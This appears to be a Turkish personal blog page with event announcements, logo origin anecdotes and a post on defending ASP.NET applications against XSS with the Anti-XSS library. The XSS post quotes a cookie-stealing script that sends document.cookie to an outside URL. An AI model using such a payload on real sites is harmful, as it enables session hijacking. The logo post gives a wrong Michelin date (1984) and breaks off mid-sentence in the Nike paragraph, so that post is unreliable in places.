Kadir Has Üniversitesi ile Gelecex'in ortak düzenlediği İnternet Girişimciliği ve İnovasyonla Kariyer semineri 14 Aralık Salı günü gerçekleşecek.

Ekibim adına yer alacağım etkinliğimize herkesi bekliyoruz.

Etkinlikte Girişimci Nasıl Olunur?, Üniversiteden Girişimciliğe Uzanan Yol ve Sektördeki Kariyer Basamakları Nasıl Hızla Aşılır vb. ana konular dahilinde deneyimler paylaşılacak.

Konuşmacılar, Fatih Demir (Tish-o Kurucu Ortağı) , Selçuk Atlı (İletken Teknoloji Kurucusu) ve  Gökhan Karatoy (Teknoface İnovasyon ve Pazarlama Yöneticisi ) den oluşuyor.

Detaylı bilgi için > http://www.gelecex.com/internet-girisimciligi-ve-inovasyonla-kariyer-semineri.html

Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList

Oracle Day Istanbul Semineri

27 Eyl 2010 In: Etkinliklerim, Güncel

 

 

 

 

 

 

 

 

 

 

 

 

 

 


Son günlerdeki gelecex üzerinde çalışmalarımıza yeni bir etkinlik ekleyerek Oracle Day Istanbul etkinliğini düzenliyoruz. Etkinlikte birbirinden değerli isimlerin konuşmacı olarak katılması içeriğin kalitesinden şüphe duyulmaz kılıyor.

Etkinliğimiz tamamen ücretsizdir ancak katılım 32 kişi ile sınırlıdır.

Kayıt ve detaylı bilgi için gelecex adresini ziyaret edebilirsiniz.

Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList

Gelecex Yayında

6 Eyl 2010 In: Genel, Güncel

 

 

 

 

 

 

 

 

 


Bir süredir planlarını yaptığımız ve çalışmaları üzerinde yoğun bir şekilde emek harcadığımız gelecex bilişim topluluğunu 1 Eylül 2010 tarihinde yayına başlattık.

Alanında uzman yönetim kadrosu, deneyimli yazarları ve birbirinden değerli üniversite temsilcilerimiz ile bilişim sektöründe birçok başarıya imza atacağımız ekibimizi oluşturduk.

Gelecex'de bilişim sektörüne yönelik haberler,etkinlik duyuruları,makaleler,röportajlar vb. birçok konuda bilgiler bulabiliyorsunuz.

Kısa bir tur atmak için tıklayın


Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList

Logolar ve Keşfedilme Öyküleri

9 Tem 2010 In: Genel

İlginç fikirlerin nasıl ortaya çıktıkları hep merak etmişimdir. Geçtiğimiz günlerde bu konuyla ilgili bir haber görmüştüm o haberdeki dikkatimi çeken logoların keşfedilme anları birçok ilgi çekici hikayede bulunabiliyor.


LACOSTE

Rene Lacoste, Fransız meşhur bir tenisçi ve aynı zamanda modacıydı. 1926’daki şampiyonayı kazandığında kendisinin tasarladığı beyaz bir gömlek giymişti. Bu gömlek, nemi tutmaya yarayan hafif kumaştan yapılmış bir gömlekti. 1927’deki Davis Kupası sırasında, timsah derisi bir bavul üzerine oynadığı bir bahis yüzünden Amerikan basını kendisine ‘timsah’ lakabını takmıştı. Arkadaşı Robert Geore, kortlarda giydiği kıyafete bir timsah resmi çizdi. Timsah logosuda böyle oluştu.

 

COCA COLA

Coca Cola’nın mucidi Dr. Pemberton’un ortağı ve aynı zamanda muhsebecisi Frank Robinson, iki C harfinin mükemmel bir estetik yaratacağını düşündü ve kendi el yazısıyla Coca Cola’nın bugüne kadar değişmeden gelen logosunu yarattı. Logonun anlamını "Nefis ve Taze" olarak belirtiyor.

 

 

 

NIKE

Nike’ın çalışanlarından Jeff Johnson, bir gece rüyasında Yunan tanrısı Nike’ı görür. Patronu Phil Knight, ürettiği ürün için ‘Dimension 6’ adını kullanmayı düşünürken, bu rüya markanın isminin değişmesinde etkili olur. Ünlü spor mağazası Nike adını


Google

Google, “googol” sözcüğünün üzerinde oynanılmasıyla ortaya çıkmıştır. Edward Kasner adındaki Amerikalı matematikçinin yeğeni Milton Sorotta tarafından üretilmiş olan “googol” sözcüğü 1 ve onun ardından 100 sıfırın gelmesiyle oluşan rakamı belirten matematiksel bir terimdir. Google’ın bu terimi kullanması, şirketin web’deki ve dünyadaki bilgi selini organize etme misyonunu yansıtır.


MICHELIN

Edouard Michelin 1984'te bir fuarda üst üste yığılmış otomobil lastiklerini görünce "kolları da olsa adama benzeyecek" demiş. Reklamcısına lastiklerden yapılmış bir adam çizimi siparişi vermiş. Bibendum adı verilen lastik adam böyle doğmuş.

 

 

APPLE

Dünyaca ünlü Apple firmasının logosundaki elmanın doğuşuyla ilgili pek çok hikaye var. Bunlardan ilki şöyle:

Çocukken, yoksul bir aileden gelen Steve Jobs'un, okulda öğlen yemeği bir elmadır. Arkadaşlarının yemek çantalarında çeşit çeşit kurabiyeler, turtalar, çörekler varken onun çantasında her zaman elma vardır. California'nın Cupertino kasabasında 1 Nisan 1976'da kurulan ve dünyanın en bilinen firmaları arasına giren bilgisayar markasının hem adı hem de amblemi elmadır. Yoksullukla geçen çocukluk yılları Steve Jobs'a 'Apple'ı ilham etmiştir.


Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList

 

 

 

 

 

 

 

 

 

 

Son yıllarda önemini güvenlik bültenlerinde üst sıralara taşıyan bir güvenlik problemi olan XSS, istatistiklerde de %39’luk bir paya sahiptir. En sık rastlanan problemlerden biri olması nedeniyle kötü niyetli kişilerin ilk uğraştıkları hedef noktalardan biri haline geliyor. XSS,uygulamalarımızda veri girişi yapılan noktalarda iyi denetim yapılamamasından dolayı oluşuyor.

Kullanıcı tarafından girilen değerler herhangi bir filtrelemeden geçmeden direk işleme konulduğu takdirde HTML ve JavaScript tabanlı kod yapıları aktif olarak uygulamamızı negatif yönde tetikleyebiliyor.

XSS ataklarına karşı en etkili çözüm yollarından biri girdi değerlerinin filtrelenmesidir. Filtrelenmiş değerler uygulamanızda belirlediğiniz alana ne tür girdilerin olacağına karar vermeniz ile doğru orantılıdır. Bir TC Kimlik numarası girdisi yapacağınız noktada harf ve diğer sembollerin girişini engellemeniz uygulamanızı bir kat daha güvende kılacaktır.

Web uygulamalarınızda kullanıcılarınızın oturum bilgilerinin güvenliği XSS ataklarının olduğu noktalarda çalınması mümkündür.

<script>

document.location='http://www.site.com/yaz.aspx?a='+document.cookie

</script>

Gördüğünüz javascript kodu vasıtasıyla kullanıcılarınıza ait oturum bilgileri saldırganın belirlediği web sitesine kayıt edilebiliyor.ASP.NET uygulamalarında diğer yazılım dillerine oranla default olarak “<” ve “>”  karakterlerinin “Potansiyel Tehlikeli Bilgi” olarak algılanması uygulamanın güvenliği riske atmıyor.

Uygulamalarımızda özellikle kullanıcı arayüzü olan noktalarda tercih edilen gelişmiş metin editörleriyle birlikte HTML içeriklerinde web sayfamıza yansıtılması gerekenler durumlar oluyor.

Bu durumlarda genellikle ValidateRequest="false" ile birlikte HTML girişlerine izin veriliyor ve bu sebepten dolayı XSS ataklarına maruz kalınması söz konusu olunuyor. Kullanıcıdan alınan bilgi ile oluşturulabilecek JavaScript, VBScript, XML de bu tehlikelere maruz kalabiliyor.

Projelerimizde zararlı içeriklerin temizlenmesi ve pasif kılınması konusundaki en önemli çözümlerden biri Anti-XSS kütüphanesinin kullanımıdır. AntiXSSLibrary.dll dosyamızı projemize referans ettikten sonra filtreleme işlemlerini kolaylıkla gerçekleştirebilirsiniz.

 

Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 adet static metot ile XSS saldırıların önüne geçebiliriz.

Bu metotlar :

  • HtmlEncode
  • HtmlAttributeEncode
  • JavaScriptEncode
  • UrlEncode
  • VisualBasicScriptEncode
  • XmlEncode
  • XmlAttributeEncode

TextBox1.Text tarafından girilen değerleri Anti-XSS filtresinden geçirmek için benzer bir yapıyı kullanabiliriz.

string mystring = Microsoft.Security.Application.AntiXss.JavaScriptEncode(TextBox1.Text, false) ;

Uygulamalarınızın güvenliğini Anti-XSS kütüphanesine dahil olarak izleyeceğiniz politikalar ile güçlendirebilirsiniz. Request Validation özelliğine her noktada güvenmemeniz ve mümkün olduğunca uygulamalarınızda Anti-XSS kütüphanesini kullanmanız güvenliğiniz için önemli derece yarar sağlayacaktır.

AntiXSS Library Download

Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList

Blog'dan

Biraz yazılım,biraz güvenlik,biraz da hayattan karalamalar ...


İletişim: ok@olcaykuk.com

Merak ettiklerini haydi sor :)